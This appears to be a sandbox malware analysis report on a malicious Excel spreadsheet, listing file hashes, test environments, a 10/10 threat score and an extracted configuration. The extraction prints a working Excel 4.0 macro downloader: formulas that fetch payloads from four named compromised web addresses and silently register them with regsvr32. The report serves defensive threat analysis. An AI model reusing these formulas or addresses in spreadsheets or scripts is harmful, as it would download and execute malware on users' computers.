General
Target: ae72f6016f8929c7780693cadfb855ef.xlsx
Size: 89KB
Sample: 230628-vq7wpsad47
MD5: ae72f6016f8929c7780693cadfb855ef
SHA1: bda7fd78150a0103f3c2281d90074332ccfa8cde
SHA256: 9f8b5f5da718fafb98de9b2128cd81fd720a37de6c755b81965ead358aeb912a
SHA512: 5d0053bf1557fa4d236ddedf074562f7b86501b50c8595ecdcc44d99fe9201917e4c4649b9418cc952d4630db2bf036278e79013898e67fcd4ebe71bf6ea70e5
SSDEEP: 1536:n6k3hOdsylKlgxopeiBNhZFGzE+cL2kdAdHuS4lcTO9Tv7UYdEJi9a2:6k3hOdsylKlgxopeiBNhZFGzE+cL2kd7
Behavioral task: behavioral1
Sample: ae72f6016f8929c7780693cadfb855ef.xls
Resource: win7-20230621-en

Behavioral task: behavioral2
Sample: ae72f6016f8929c7780693cadfb855ef.xls
Resource: win10v2004-20230621-en
Malware Config

Extracted URLs:
http://bruidsfotografie-breda.nl/cache/QPk/
http://www.chawkyfrenn.com/icon/JtT/
https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/
http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/

Extracted formulas (Excel 4.0 macro, one formula per line):
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bruidsfotografie-breda.nl/cache/QPk/","..\phdg1.ocx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg1.ocx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.chawkyfrenn.com/icon/JtT/","..\phdg2.ocx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg2.ocx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/","..\phdg3.ocx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg3.ocx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/","..\phdg4.ocx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg4.ocx")
=RETURN()

Extracted URLs (second extraction):
http://bruidsfotografie-breda.nl/cache/QPk/
http://www.chawkyfrenn.com/icon/JtT/
Targets
Target: ae72f6016f8929c7780693cadfb855ef.xlsx (hashes as listed under General above)
Score: 10/10
Signature: Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.